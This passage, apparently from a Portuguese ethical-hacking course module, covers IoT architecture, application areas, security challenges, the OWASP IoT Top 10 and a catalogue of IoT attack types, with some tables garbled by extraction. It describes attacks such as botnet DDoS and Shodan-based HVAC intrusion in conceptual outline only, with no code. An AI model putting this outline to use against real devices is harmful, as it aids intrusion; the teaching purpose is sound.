proibida.
os direitos reservados.
Como funciona a IoT
A tecnologia IoT inclui quatro sistemas principais: dispositivos IoT, sistemas de gateway, sistemas de
armazenamento de dados usando tecnologia de nuvem e controle remoto usando aplicativos móveis. Esses
sistemas juntos possibilitam a comunicação entre dois terminais.
Discutidos abaixo estão alguns dos componentes importantes da tecnologia IoT que desempenham um papel
essencial na função de um dispositivo IoT:
ÿ Tecnologia de Detecção: Os sensores embutidos nos dispositivos detectam uma ampla variedade de
informações de seus arredores, incluindo temperatura, gases, localização, funcionamento de algumas
máquinas industriais ou dados de saúde de um paciente.
ÿ Gateways IoT: Gateways são usados para preencher a lacuna entre um dispositivo IoT (rede interna) e
o usuário final (rede externa), permitindo que eles se conectem e se comuniquem entre si. Os dados
coletados pelos sensores no dispositivo IoT são enviados ao usuário conectado ou à nuvem por meio
do gateway.
ÿ Cloud Server/Armazenamento de Dados: Após trafegar pelo gateway, os dados coletados chegam à
nuvem, onde são armazenados e submetidos à análise de dados. Os dados processados são então
transmitidos ao usuário, que pode realizar determinadas ações com base nas informações recebidas.
ÿ Controle remoto usando aplicativo móvel: o usuário final usa controles remotos, como telefones
celulares, tablets, laptops, etc. instalados com um aplicativo móvel para monitorar, controlar, recuperar
dados e executar uma ação específica em dispositivos IoT a partir de um local remoto .

Exemplo:
1. Um sistema de segurança inteligente instalado em uma casa será integrado a um gateway, que
por sua vez ajuda a conectar o dispositivo à Internet e à infraestrutura de nuvem.
2. Os dados armazenados em nuvem incluem informações sobre todos os dispositivos conectados à

rede. Essas informações incluem o ID do dispositivo e o status atual do dispositivo, bem como
informações sobre quem acessou o dispositivo e quantas vezes. Também inclui informações
como por quanto tempo o dispositivo foi acessado anteriormente.
3. A conexão com o servidor em nuvem é estabelecida por meio de serviços da web.
4. O usuário do outro lado, que possui o aplicativo necessário para acessar o dispositivo remotamente
em seu celular, interage com ele, o que por sua vez permite que ele interaja com o dispositivo
em casa. Antes de acessar o dispositivo, ele é solicitado a se autenticar. Se as credenciais
enviadas por ele corresponderem às salvas na nuvem, ele terá acesso. Caso contrário, seu
acesso é negado, garantindo a segurança. O servidor em nuvem identifica o ID do dispositivo e
envia uma solicitação associada a esse dispositivo usando gateways.
5. O sistema de segurança que está gravando a filmagem em casa, se detectar alguma atividade
incomum, envia um alerta para a nuvem através do gateway, que corresponde ao ID do
dispositivo e do usuário associado a ele e, finalmente, o end- usuário recebe um alerta.
Figura 10.2: Funcionamento da IoT

Arquitetura IoT
Inscrição
Entrega de vários aplicativos para diferentes usuários em IoT
Camada
Middleware
Gerenciamento de dispositivos e gerenciamento de informações
Camada
Internet
Conexão entre pontos de extremidade
Camada
Portal de acesso
Tradução de protocolo e mensagens
Camada
Tecnologia de ponta Sensores, dispositivos, máquinas e nós de borda inteligentes

Camada de vários tipos
Arquitetura IoT
A arquitetura IoT inclui várias camadas, desde a camada de Aplicativo na parte superior até a camada de Tecnologia de
Borda na parte inferior. Essas camadas são projetadas de forma que possam atender aos requisitos de vários setores,
incluindo sociedades, indústrias, empresas, governos, etc.
As funções desempenhadas por cada camada na arquitetura são dadas a seguir:
ÿ Camada de Tecnologia de Borda
Essa camada consiste em todos os componentes de hardware, incluindo sensores, etiquetas de identificação por
radiofrequência (RFID), leitores ou outros sensores de software e o próprio dispositivo. Essas entidades são a parte
principal dos sensores de dados implantados no campo para monitorar ou detectar vários fenômenos. Essa camada
desempenha um papel importante na coleta de dados e na conexão de dispositivos dentro da rede e com o servidor.
ÿ Camada de Gateway de Acesso
Essa camada ajuda a preencher a lacuna entre dois terminais, como um dispositivo e um cliente.
A manipulação inicial de dados também ocorre nesta camada. Essa camada realiza o roteamento de mensagens,
a identificação de mensagens e a assinatura.
ÿ Camada Internet
Essa é uma camada crucial, pois serve como o principal componente na realização da comunicação entre dois
endpoints, como dispositivo para dispositivo, dispositivo para nuvem, dispositivo para gateway ou compartilhamento
de dados de back-end.

ÿ Camada de Middleware
Essa é uma das camadas mais críticas que opera no modo bidirecional. Como o nome sugere, essa
camada fica no meio da camada de aplicativo e da camada de hardware, comportando-se como uma
interface entre essas duas camadas. É responsável por funções importantes, como gerenciamento de
dados, gerenciamento de dispositivos e vários problemas, como análise de dados, agregação de dados,
filtragem de dados, descoberta de informações do dispositivo e controle de acesso.
ÿ Camada de Aplicação
Esta camada, colocada no topo da pilha, é responsável pela entrega de serviços aos usuários relevantes
de diferentes setores, incluindo construção, indústria, manufatura, automóvel, segurança, saúde, etc.

Áreas e dispositivos de aplicação IoT

Setores de serviço Grupos de aplicativos Localizações Dispositivos
• Escritório, Educação, Varejo, Hospitalidade, Saúde,

• Comercial/Institucional AVAC, Transportes, Incêndio e Segurança, Iluminação, Segurança,
Aeroportos, Estádios
Edifícios
Acessos, etc.
• Industrial • Processo, Sala Limpa, Campus
• Power Gen, Trans & Dist, Baixa Tensão, Energia

• Oferta/Demanda
Qualidade, Gestão de energia
Turbinas, Moinhos de Vento, UPS, Baterias, Geradores, Medidores,
Energia • Alternativo • Eólica Solar, Cogeração, Eletroquímica Furadeiras, Células de Combustível, etc.
• Gás de petróleo • Plataformas, Torres, Cabeçotes, Bombas, Oleodutos
• A infraestrutura • Fiação, acesso à rede, gerenciamento de energia

Câmeras Digitais, Sistemas de Energia, MID, e-Readers, Máquinas
• Segurança/Alertas, Segurança Contra Incêndio, Idosos, Crianças, Energia de Lavar Louça, Computadores de Mesa, Máquinas de Lavar/
• Conscientização e Segurança Proteção
Consumidor e Casa Secar, Medidores, Luzes, TVs, Dispositivos MP3, Consoles de
Jogos, Alarmes, etc.
• Conveniência e Entretenimento • HVAC/clima, iluminação, eletrodomésticos, entretenimento
• Cuidado • Hospital, pronto-socorro, celular, POC, clínica, laboratórios, consultório médico

Saúde e Máquinas de Ressonância Magnética, PDAs, Implantes,
Ciências da Vida • Ao vivo/Casa • Implantes, Casa, Sistemas de Monitoramento Equipamentos Cirúrgicos, Bombas, Monitores, Telemedicina, etc.
• Pesquisar • Descoberta de medicamentos, diagnósticos, laboratórios
• Não veicular • Aéreo, Ferroviário, Marítimo
• Veículos
Transporte • Consumidor, Comercial, Construção, Fora de Estrada Veículos, Luzes, Navios, Aviões, Sinalização, Pedágios, etc.
• Sistemas de transporte • Portagens, Gestão de Trânsito, Navegação
http:// www.beechamresearch.com
Áreas e dispositivos de aplicação IoT (continuação)

Grupos de aplicativos de setores de serviço Localizações Dispositivos
• Automação de recursos • Mineração, Irrigação, Agricultura, Floresta
• Fluidos/Processos • Petroquímica, Hidrelétrica, Carbonos, Alimentos, Bebidas Bombas, Válvulas, Cubas, Transportadores,
Industrial • Metais, Papéis, Borracha/Plástico, Eletrônica metalúrgica, Fabricação, Montagem/Embalagem, Vasos/
• Conversão/Discreta Tanques, etc.
Montagem/Teste
• Distribuição • Dutos, Transporte
• Especialidade • Postos de Combustível, Jogos, Boliche, Cinemas, Discotecas, Eventos Especiais
• Terminais POS, Tags, Caixas Registradoras,

Retalho Hospitalidade • Hotéis Restaurantes, Bares, Cafés, Clubes
Máquinas de Venda Automática, Sinais, etc.
• Lojas • Supermercados, Centros Comerciais, Local Único, Distribuição, Centros
• Vigilância • Radar/Satélite, Meio Ambiente, Segurança Militar, Não Tripulado, Fixo
• Equipamento • Armas, Veículos, Navios, Aeronaves, Equipamentos

Tanques, caças, campos de batalha, jipes, carros,
Segurança / • Rastreamento • Humano, Animal, Postal, Alimentos, Saúde, Bagagem ambulância, segurança interna, meio ambiente,
Segurança Pública monitor, etc.
• Água, Tratamento, Edificação, Meio Ambiente. Equipar. e pessoal, polícia, bombeiros,
• Infraestrutura pública
regulamentação
• Serviços de emergência • Ambulância, Polícia, Bombeiros, Segurança Interna
•
Isso e Público • Serviços, comércio eletrônico, data centers, operadoras de celular, ISPs Servidores, Armazenamento, PCs,
Redes • Empresa privada • Escritório de TI/Data Center, Redes de Privacidade
Roteadores, Switches, PBXs, etc.
http:// www.beechamresearch.com
Áreas e dispositivos de aplicação IoT
Os dispositivos IoT têm uma ampla gama de aplicações. Eles são usados em quase todos os setores da
sociedade para auxiliar de várias maneiras a simplificar a rotina de trabalho e tarefas pessoais e, assim,
melhorar o padrão de vida. A tecnologia IoT está incluída em casas e edifícios inteligentes, dispositivos de
saúde, aparelhos industriais, transporte, dispositivos de segurança, setor de varejo, etc.

Algumas das aplicações dos dispositivos IoT são as seguintes:
ÿ Dispositivos inteligentes que estão conectados à Internet, fornecendo diferentes serviços aos usuários
finais, incluem termostatos, sistemas de iluminação e sistemas de segurança e vários outros sistemas
que residem em edifícios.
ÿ
Nos setores de saúde e ciências da vida, os dispositivos incluem dispositivos vestíveis, dispositivos de
monitoramento de saúde, como marcapassos cardíacos implantados, ECG, EKG, equipamentos
cirúrgicos, telemedicina, etc.
ÿ A Internet Industrial das Coisas (IIoT) está atraindo crescimento por meio de três abordagens: aumento da
produção para aumentar a receita, usando tecnologia inteligente que está mudando totalmente a forma
como os produtos são feitos e a criação de novos modelos de negócios híbridos.
ÿ Da mesma forma, o uso da tecnologia IoT no setor de transporte segue o conceito de comunicação veículo-
veículo, veículo-via e veículo-pedestre, melhorando assim as condições de tráfego, sistemas de
navegação e esquemas de estacionamento.
ÿ A IoT no varejo é usada principalmente em pagamentos, anúncios e rastreamento ou monitoramento de

produtos para protegê-los contra roubo e perda, aumentando assim a receita.
ÿ
Em TI e redes, os dispositivos IoT incluem principalmente várias máquinas de escritório, como
impressoras, aparelhos de fax e copiadoras, bem como sistemas de monitoramento PBX; eles servem
para melhorar a comunicação entre os terminais e facilitar o envio de dados por longas distâncias.
Fonte: http:// www.beechamresearch.com
Setores de serviço
Inscrição Localizações Dispositivos
Grupos
Comercial/ Escritório, Educação, Varejo, Hotelaria, Aquecimento, Ventilação e Ar
Institucional Saúde, Aeroportos, Estádios Condicionado (AVAC),
Edifícios Transportes, Incêndio e
Industrial Processo, Sala Limpa, Campus Segurança, Iluminação,
Segurança, Acessos, etc.
Geração de energia, transporte e

Fornecer/
Distribuição, Baixa Tensão, Energia
Demanda Turbinas, Moinhos de Vento, UPS,
Qualidade, Gestão de Energia
Baterias, Geradores,
Energia
Eólica Solar, Cogeração, Medidores, Furadeiras, Células de Combustível,
Alternativo
eletroquímica etc.
Gás de petróleo Plataformas, Derricks, Cabeçotes, Bombas, Oleodutos
Fiação, acesso à rede, energia Câmeras Digitais, Sistemas de

A infraestrutura
Gerenciamento Energia, MID, e-Readers,
Consumidor Conscientização e Máquinas de Lavar Louça,

Segurança/Alertas, Segurança Contra Incêndios, Idosos,
Computadores de Mesa, Máquinas
e Segurança Crianças, proteção de energia
de Lavar/Secar, Medidores, Luzes,
Lar Conveniência e TVs, Dispositivos MP3, Consoles
HVAC/Clima, Iluminação, Eletrodomésticos,
de Jogos, Alarmes, etc.
Entretenimento
Entretenimento

Hospital, pronto-socorro, celular, POC, clínica, laboratórios, Máquinas de Ressonância

Cuidado
Cuidados de saúde consultórios médicos
Magnética, PDAs, Implantes,
e Equipamentos Cirúrgicos,
Ao vivo/Casa Implantes, Casa, Sistemas de Monitoramento
Ciência da vida Bombas, Monitores, Telemedicina,
Pesquisar Descoberta de medicamentos, diagnósticos, laboratórios
etc.
Não veicular Aéreo, Ferroviário, Marítimo
Consumidor, Comercial, Construção, Veículos, Luzes, Navios,

Veículos
Transporte Fora de estrada Aviões, Sinalização, Pedágios,
etc.
Transporte
Portagens, Gestão de Tráfego, Navegação
Sistemas
Recurso Mineração, Irrigação, Agrícola,

Automação floresta
Fluido/ Petroquímicos, Hidro, Carbonos, Alimentos,

Bombas, Válvulas, Cubas,
Processos Bebidas
Transportadores, Fabricação,
Industrial
Metais, Papéis, Borracha/Plástico, Montagem/Embalagem, Vasos/
Convertendo/
Metalurgia, Eletrônica, Tanques, etc.
Discreto
Montagem/Teste
Distribuição Oleodutos, Transporte
Postos de combustível, jogos, boliche,

Especialidade
Cinemas, Discotecas, Eventos Especiais
Terminais POS, Tags, Caixas
Retalho Hospitalidade Hotéis Restaurantes, Bares, Cafés, Clubes Registradoras, Máquinas de Venda
Automática, Sinais, etc.
Supermercados, Centros Comerciais,
Lojas
Local Único, Distribuição, Centros
Radar/Satélite, Meio Ambiente, Militar

Vigilância
Segurança, Não Tripulado, Fixo
Armas, Veículos, Navios, Aeronaves,

Equipamento
Engrenagem
Tanques, caças, campos
Humano, Animal, Postal, Alimentos, Saúde, de batalha, jipes, carros,
Segurança / Rastreamento
Bagagem ambulância, segurança interna,
Segurança Pública
meio ambiente, monitor, etc.
Água, Tratamento, Construção,
Público
Ambiente, Equipamentos e
A infraestrutura
Pessoal, Polícia, Bombeiros, Regulamentar
Emergência Ambulância, Polícia, Incêndio, Pátria

Serviços Segurança
Serviços, Comércio Eletrônico, Data Centers,

ISTO Público
Servidores, Armazenamento,
Operadoras móveis, ISPs
e PCs, Roteadores, Switches,
Privado PBXs, etc.
Redes Escritório de TI/Data Center, redes de privacidade
Empreendimento
Tabela 10.1: Áreas e dispositivos de aplicação IoT

Fluxo do módulo

2 Ataques
Discutir ataque IoT

3 Contramedidas
Discutir ameaças e ataques de IoT
Os invasores implementam várias técnicas para lançar ataques em dispositivos ou redes de IoT de destino.
Esta seção discute as principais ameaças de IoT e técnicas de ataque, incluindo ataques distribuídos de
negação de serviço (DDoS), ataques a sistemas HVAC, ataques de código contínuo, ataques BlueBorne e
ataques de interferência.

Desafios da IoT
Protocolos de texto claro e portas abertas
Falta de segurança e privacidade 1 5 desnecessárias
Interfaces da web vulneráveis

2 6 Erros de codificação (estouro de buffer)
Questões legais, regulatórias e de direitos 3 7 Problemas de armazenamento
Credenciais padrão, fracas e

codificadas 4 8 Difícil atualizar o firmware e o sistema operacional
Desafios da IoT
A tecnologia IoT está crescendo tão rapidamente que se tornou onipresente. Com vários aplicativos e recursos, mas
sem políticas básicas de segurança, os dispositivos IoT são atualmente presas fáceis para hackers.
Além disso, atualizações para dispositivos IoT introduziram novas falhas de segurança que podem ser facilmente
exploradas por hackers. Para superar esse problema significativo, as empresas de manufatura devem considerar a
segurança como a principal prioridade, começando pelo planejamento e design e até a implantação, implementação,
gerenciamento e manutenção.
Discutidos abaixo estão alguns dos desafios enfrentados pelos dispositivos IoT que os tornam vulneráveis a ameaças:
ÿ Falta de segurança e privacidade: a maioria dos dispositivos IoT atuais, como dispositivos domésticos,
dispositivos industriais, dispositivos de saúde, automóveis, etc., estão conectados à Internet e contêm dados
importantes e confidenciais. Esses dispositivos carecem até de políticas básicas de segurança e privacidade,
e os hackers podem explorar isso para realizar atividades maliciosas.
ÿ Interfaces da Web vulneráveis: Muitos dispositivos IoT vêm com servidor da Web incorporado
tecnologia que os torna vulneráveis a ataques.
ÿ Questão Legal, Regulatória e de Direitos: Devido à interconexão de dispositivos IoT, certos

questões de segurança são levantadas sem leis existentes que tratem dessas questões.
ÿ Credenciais padrão, fracas e codificadas: um dos motivos mais comuns para ataques cibernéticos em
dispositivos IoT são seus sistemas de autenticação. Esses dispositivos geralmente vêm com credenciais
padrão e fracas, que podem ser facilmente exploradas por um hacker para obter acesso não autorizado aos
dispositivos.

ÿ Protocolos de texto não criptografado e portas abertas desnecessárias: os dispositivos IoT carecem de
técnicas de criptografia durante a transmissão de dados, o que às vezes faz com que eles usem determinados
protocolos que transmitem dados em texto não criptografado, além de terem portas abertas.
ÿ Erros de codificação (estouro de buffer): a maioria dos dispositivos IoT hoje possui serviços da Web
incorporados que estão sujeitos às mesmas vulnerabilidades que são comumente exploradas em plataformas
de serviços da Web. Como resultado, a atualização dessa funcionalidade pode gerar problemas como estouro
de buffer, injeção de SQL etc. na infraestrutura de tecnologia.
ÿ Problemas de armazenamento: os dispositivos IoT geralmente vêm com menor capacidade de armazenamento
de dados, mas os dados coletados e transmitidos pelos dispositivos são ilimitados. Portanto, isso gera
problemas de armazenamento, gerenciamento e proteção de dados.
ÿ Firmware e sistema operacional difíceis de atualizar: atualizar o firmware é uma etapa essencial para
combater vulnerabilidades em um dispositivo, mas pode prejudicar a funcionalidade de um dispositivo. Por
esse motivo, desenvolvedores ou fabricantes podem hesitar ou mesmo se recusar a fornecer suporte ao
produto ou fazer ajustes durante a fase de desenvolvimento de seus produtos.
ÿ Questões padrão de interoperabilidade: Um dos maiores obstáculos para dispositivos IoT é a questão de
interoperabilidade, que é a chave para a viabilidade e o crescimento de longo prazo de todo o ecossistema
IoT. Os problemas que surgem devido à falta de interoperabilidade em dispositivos IoT são a incapacidade
dos fabricantes de testar interfaces de programação de aplicativos (APIs) usando métodos e mecanismos
comuns, sua incapacidade de proteger dispositivos usando software de terceiros e sua incapacidade de
gerenciar e monitorar dispositivos usando uma camada comum.
ÿ Roubo físico e adulteração: Ataques físicos em dispositivos IoT incluem adulteração dos dispositivos para
injetar códigos maliciosos ou arquivos para fazer os dispositivos funcionarem da maneira pretendida pelo
invasor ou fazer modificações de hardware nos dispositivos. A falsificação dos dispositivos também pode ser
um problema quando a proteção física adequada não está presente para proteger os dispositivos.
ÿ Falta de suporte do fornecedor para corrigir vulnerabilidades: o firmware dos dispositivos deve ser
atualizado para proteger os dispositivos contra certas vulnerabilidades, mas os fornecedores hesitam ou
geralmente se recusam a obter acesso de terceiros aos seus dispositivos.
ÿ Questões emergentes de economia e desenvolvimento: com amplas oportunidades para dispositivos IoT em
todos os campos, várias camadas de complexidade são adicionadas para os formuladores de políticas. O
novo cenário introduzido por esses dispositivos adiciona uma nova dimensão para os formuladores de
políticas, que precisam projetar novos projetos e políticas para dispositivos IoT.
ÿ Tratamento de dados não estruturados: Um aumento no número de dispositivos conectados aumentará a

complexidade do tratamento de dados não estruturados à medida que seu volume, velocidade e variedade
aumentam. É importante que as organizações entendam e determinem quais dados são valiosos e acionáveis.

Problemas de segurança da IoT
Validação da string inserida, AuthN, AuthZ, sem

INSCRIÇÃO
atualizações automáticas de segurança, senhas padrão
Firewall, criptografia de comunicações imprópria, serviços, falta

REDE
de atualizações automáticas
API insegura, falta de criptografia dos canais de

MÓVEL
comunicação, autenticação, falta de segurança de armazenamento
Autenticação imprópria, sem criptografia para armazenamento e

NUVEM
comunicações, interface web insegura
IoT Aplicativo + Rede + Móvel + Nuvem = IoT

https:// www.hhs.gov
Problemas de segurança da IoT
Potenciais vulnerabilidades no sistema IoT podem resultar em grandes problemas para as organizações. A maioria dos
dispositivos IoT vem com problemas de segurança, como a ausência de um mecanismo de autenticação adequado ou o uso
de credenciais padrão, ausência de um mecanismo de bloqueio, ausência de um esquema de criptografia forte, ausência de
sistemas de gerenciamento de chaves adequados e segurança física inadequada.
Alguns dos problemas de segurança em cada camada da arquitetura IoT são apresentados abaixo:
Figura 10.3: Problemas de segurança na arquitetura IoT

As 10 principais ameaças de IoT da OWASP
Fraco, Adivinhável ou
01 Senhas codificadas
Privacidade insuficiente
06
Proteção
OPÇÃO
01
02 Serviços de rede inseguros Transferência e armazenamento

07 OPÇÃO
01
de dados inseguros
Ecossistema inseguro
03 Interfaces
Falta de Dispositivo
08 OPÇÃO
01
Gerenciamento
Falta de atualização segura

04 Mecanismos
Padrão inseguro
09
Definições OPÇÃO
01
Uso de Inseguro ou
05 Componentes desatualizados
Falta de Físico
10 OPÇÃO
01
Endurecimento
As 10 principais ameaças de IoT da OWASP
As 10 principais ameaças de IoT, de acordo com o Open Web Application Security Project (OWASP), estão listadas
abaixo:
ÿ Senhas Fracas, Adivinhadas ou Codificadas
O uso de senhas fracas, fáceis de adivinhar ou codificadas permite que credenciais publicamente disponíveis
ou imutáveis sejam determinadas por meio de força bruta. Isso também inclui backdoors no firmware ou
software cliente que levam ao acesso não autorizado ao
dispositivos implantados.
ÿ Serviços de rede inseguros
Serviços de rede inseguros são propensos a vários ataques, como ataques de estouro de buffer, que causam
um cenário de negação de serviço, deixando o dispositivo inacessível ao usuário. Um invasor usa várias
ferramentas automatizadas, como scanners de porta e fuzzers, para detectar as portas abertas e explorá-las
para obter acesso não autorizado aos serviços.
Esses serviços de rede inseguros abertos à Internet podem comprometer a confidencialidade, autenticidade,
integridade ou disponibilidade de informações e também permitir o acesso remoto a informações críticas.
ÿ Interfaces Ecossistêmicas Inseguras
Interfaces de ecossistema inseguras, como web, API de back-end, dispositivos móveis e interfaces de nuvem
fora do dispositivo, levam ao comprometimento da segurança do dispositivo e de seus componentes.
Vulnerabilidades comuns em tais interfaces incluem falta de autenticação/autorização, falta de criptografia ou
criptografia fraca e falta de filtragem de entrada/saída.

ÿ Falta de Mecanismos de Atualização Segura
A falta de mecanismos seguros de atualização, como falta de validação de firmware no dispositivo, falta de entrega segura,
falta de mecanismos anti-reversão ou falta de notificações de alterações de segurança, pode ser explorada para realizar
vários ataques.
ÿ Uso de Componentes Inseguros ou Desatualizados
O uso de versões desatualizadas ou mais antigas de componentes ou bibliotecas de software, como personalização
insegura de plataformas de sistema operacional ou uso de componentes de hardware ou software de terceiros de uma
cadeia de suprimentos comprometida, pode permitir que os próprios dispositivos sejam comprometidos.
ÿ Proteção de Privacidade Insuficiente
A proteção insuficiente da privacidade permite que as informações pessoais do usuário armazenadas nos dispositivos ou
no ecossistema sejam comprometidas.
ÿ Transferência e armazenamento de dados inseguros
A falta de criptografia e controle de acesso de dados em trânsito ou em repouso pode resultar no vazamento de
informações confidenciais para usuários mal-intencionados.
ÿ Falta de Gerenciamento de Dispositivos
A falta de suporte de segurança apropriado por meio do gerenciamento de dispositivos implantados na produção, incluindo
gerenciamento de ativos, gerenciamento de atualizações, descomissionamento seguro, monitoramento do sistema e
recursos de resposta, pode abrir a porta para vários ataques.
ÿ Configurações padrão inseguras
Configurações de dispositivo inseguras ou insuficientes impedem que os operadores modifiquem as configurações para
tornar o dispositivo mais seguro.
ÿ Falta de Endurecimento Físico
A falta de medidas de proteção física permite que invasores em potencial adquiram informações confidenciais que os
ajudam a realizar um ataque remoto ou obter o controle local do dispositivo.

Ameaças IoT
Ataque DDoS Acesso remoto usando Injeção SQL

01 06 11 Replay Attack 16
Porta dos fundos Ataque
Ataque ao HVAC Acesso remoto usando Forjado Malicioso

02 07 12 17 Ataque baseado em SDR
Sistemas Telnet Dispositivo
Injeção de falha
03 Rolling Code Attack 08 Sybil Attack 13 Ataque de Canal Lateral 18
Ataque
04 Ataque Blueborne 09 Kits de exploração 14 ransomware 19 Pivotagem de rede
Homem no meio Religação de DNS

5 ataque de interferência 10 15 Representação do cliente 20
Ataque Ataque
Ameaças IoT
Os dispositivos IoT têm muito poucos mecanismos de proteção de segurança contra várias ameaças emergentes.
Esses dispositivos podem ser infectados por malware ou código malicioso em uma taxa alarmante. Os invasores
geralmente exploram esses dispositivos mal protegidos na Internet para causar danos físicos à rede, para grampear a
comunicação e também para lançar ataques perturbadores, como DDoS.
Listados abaixo estão alguns tipos de ataque IoT:
ÿ Ataque DDoS: um invasor converte os dispositivos em um exército de botnets para atingir um sistema ou servidor
específico, tornando-o indisponível para fornecer serviços.
ÿ Ataque a sistemas HVAC: as vulnerabilidades do sistema HVAC são exploradas por invasores para roubar
informações confidenciais, como credenciais de usuário, e realizar outros ataques à rede de destino.
ÿ Rolling Code Attack: Um invasor bloqueia e fareja o sinal para obter o código transferido para o receptor de um
veículo; o atacante então o usa para destravar e roubar o veículo.
ÿ Ataque BlueBorne: Os invasores se conectam a dispositivos próximos e exploram as vulnerabilidades de

o protocolo Bluetooth para comprometer o dispositivo.
ÿ Ataque de interferência: um invasor bloqueia o sinal entre o remetente e o destinatário com tráfego malicioso
que torna os dois terminais incapazes de se comunicar um com o outro.
ÿ Acesso Remoto usando Backdoor: Os invasores exploram vulnerabilidades no dispositivo IoT para
transformá-lo em um backdoor e obter acesso à rede de uma organização.

ÿ Acesso remoto usando Telnet: os invasores exploram uma porta telnet aberta para obter informações que são
compartilhadas entre os dispositivos conectados, incluindo seus modelos de software e hardware.
ÿ Ataque Sybil: Um invasor usa várias identidades forjadas para criar uma forte ilusão de congestionamento de
tráfego, afetando a comunicação entre nós e redes vizinhas.
ÿ Kits de exploração: um script malicioso é usado pelos invasores para explorar mal corrigidos
vulnerabilidades em um dispositivo IoT.
ÿ Ataque Man-in-the-Middle: Um invasor finge ser um remetente legítimo que intercepta toda a comunicação entre o
remetente e o destinatário e sequestra a comunicação.
ÿ Replay Attack: Os invasores interceptam mensagens legítimas de comunicação válida e enviam continuamente a
mensagem interceptada ao dispositivo de destino para realizar um ataque de negação de serviço ou travar o
dispositivo de destino.
ÿ Dispositivo malicioso forjado: os invasores substituem dispositivos IoT autênticos por dispositivos maliciosos se
tiverem acesso físico à rede.
ÿ Ataque de canal lateral: Os invasores realizam ataques de canal lateral extraindo informações sobre chaves de
criptografia observando a emissão de sinais, ou seja, “canais laterais”, de dispositivos IoT.
ÿ Ataque Ransomware: Ransomware é um tipo de malware que usa criptografia para bloquear o acesso de um
usuário ao seu dispositivo bloqueando a tela ou os arquivos do usuário.
ÿ Personificação do cliente: um invasor se disfarça como um dispositivo/servidor inteligente legítimo usando um

dispositivo malicioso e compromete um dispositivo cliente IoT ao se passar por ele, para realizar atividades não
autorizadas ou acessar informações confidenciais em nome do cliente legítimo.
ÿ Ataque de injeção de SQL: Os invasores executam ataques de injeção de SQL explorando vulnerabilidades nos
aplicativos móveis ou da Web usados para controlar os dispositivos IoT, para obter acesso aos dispositivos e
realizar novos ataques a eles.
ÿ Ataque baseado em SDR: usando um sistema de comunicação de rádio baseado em software, um invasor pode
examinar os sinais de comunicação que passam pela rede IoT e pode enviar mensagens de spam para os
dispositivos interconectados.
ÿ Ataque de injeção de falha: Um ataque de injeção de falha ocorre quando um invasor tenta introduzir um
comportamento de falha em um dispositivo IoT, com o objetivo de explorar essas falhas para comprometer a
segurança desse dispositivo.
ÿ Rede dinâmica: um invasor usa um dispositivo inteligente mal-intencionado para se conectar e obter acesso a um
servidor fechado e, em seguida, usa essa conexão para dinamizar outros dispositivos e conexões de rede com o
servidor para roubar informações confidenciais.
ÿ Ataque de religação de DNS: a religação de DNS é um processo de obtenção de acesso ao endereço da vítima
roteador usando um código JavaScript malicioso injetado em uma página da web.

Hackeando Dispositivos IoT: Cenário Geral
servidor falso
Servidor
Rede
espionagem
Dispositivos Falsos
Dispositivos
Hackeando Dispositivos IoT: Cenário Geral
A IoT inclui diferentes tecnologias, como sensores embutidos, microprocessadores e dispositivos de gerenciamento
de energia. A consideração de segurança muda de dispositivo para dispositivo e de aplicativo para aplicativo.
Quanto maior a quantidade de dados confidenciais que enviamos pela rede, maior o risco de roubo de dados,
manipulação de dados, adulteração de dados e ataques a roteadores e
servidores.
Infraestrutura de segurança inadequada pode levar aos seguintes cenários indesejados:
ÿ Um espião intercepta a comunicação entre dois terminais e descobre as informações confidenciais que são
enviadas. Ele/ela pode fazer uso indevido dessas informações para seu próprio benefício.
ÿ Um servidor falso pode ser usado para enviar comandos indesejados para acionar eventos não planejados.
Por exemplo, alguns recursos físicos (água, carvão, petróleo, eletricidade) podem ser enviados para um
destino desconhecido e não planejado, etc.
ÿ Um dispositivo falso pode injetar um script malicioso no sistema para fazê-lo funcionar conforme instruído
pelo dispositivo. Isso pode fazer com que o sistema se comporte de forma inadequada e perigosa.

Figura 10.4: Cenários gerais de hacking de dispositivos IoT

Ataque DDoS
IoT comprometida
Dispositivos (botnets)
ÿ O invasor inicia o ataque

Atacante injeta
explorando as O invasor obtém malware em
vulnerabilidades nos dispositivos acesso remoto aos dispositivos IoT
dispositivos vulneráveis para transformá -los em bots
e instalar um software
malicioso em seus sistemas
operacionais
ÿ Múltiplos dispositivos IoT

infectados são chamados de O invasor usa o
centro de
Exército de Botnets C&C instruem botnets comando e
controle para lançar o ataque
Comando e
ÿ O alvo é atacado com um grande Atacante
Centro de Controle
volume de solicitações de
vários dispositivos IoT
O servidor fica offline e não
presentes em diferentes locais consegue processar mais
solicitações
servidor de destino servidor de destino
Ataques IoT
Ataque DDoS
Um ataque distribuído de negação de serviço (DDoS) é um ataque no qual vários sistemas infectados são usados para
bombardear um único sistema ou serviço online, tornando o servidor inútil, lento ou indisponível para um usuário
legítimo por um curto período de tempo. O invasor inicia o ataque explorando primeiro as vulnerabilidades nos
dispositivos e, em seguida, instalando software malicioso em seus sistemas operacionais. Esses vários dispositivos
comprometidos são chamados de exército de botnets.
Depois que um invasor decide sobre seu alvo, ele instrui os botnets ou agentes zumbis a enviar solicitações ao servidor
de destino que está atacando. O alvo é atacado por um grande volume de solicitações de vários dispositivos IoT
presentes em diferentes locais. Como resultado, o sistema de destino é inundado com mais solicitações do que pode
atender. Portanto, ele fica offline, sofre uma perda de desempenho ou desliga completamente.
Abaixo estão as etapas seguidas por um invasor para realizar um ataque DDoS em dispositivos IoT:
ÿ O invasor obtém acesso remoto a dispositivos vulneráveis
ÿ Após obter acesso, injeta malware nos dispositivos IoT para transformá-los em
botnets
ÿ O invasor usa um centro de comando e controle para instruir botnets e enviar várias solicitações ao servidor de
destino, resultando em um ataque DDoS
ÿ O servidor de destino fica off-line e fica indisponível para processar outras solicitações

Figura 10.5: Ataque DDoS em dispositivos IoT

Explorar HVAC
ÿ Muitas organizações usam sistemas de aquecimento, ventilação e ar condicionado (HVAC) conectados à Internet sem
implementação de mecanismos de segurança; isso dá aos invasores uma porta de entrada para hackear sistemas corporativos
ÿ Os sistemas HVAC têm muitas vulnerabilidades de segurança que são exploradas por invasores para roubar credenciais de login, obter acesso a
o sistema HVAC e realizar mais ataques na rede da organização
O invasor tenta as
Atacante usando credenciais de usuário

Shodan procura por padrão para acessar o
sistemas ICS vulneráveis sistema ICS
O invasor controla a temperatura do O invasor obtém acesso ao

Atacante
HVAC ou realiza outros ataques na Sistema HVAC através do ICS
Organização rede local
Rede HVAC
Explorar HVAC
Muitas organizações usam sistemas de aquecimento, ventilação e ar condicionado (HVAC) conectados à

Internet sem implementar mecanismos de segurança, dando aos invasores um gateway para hackear
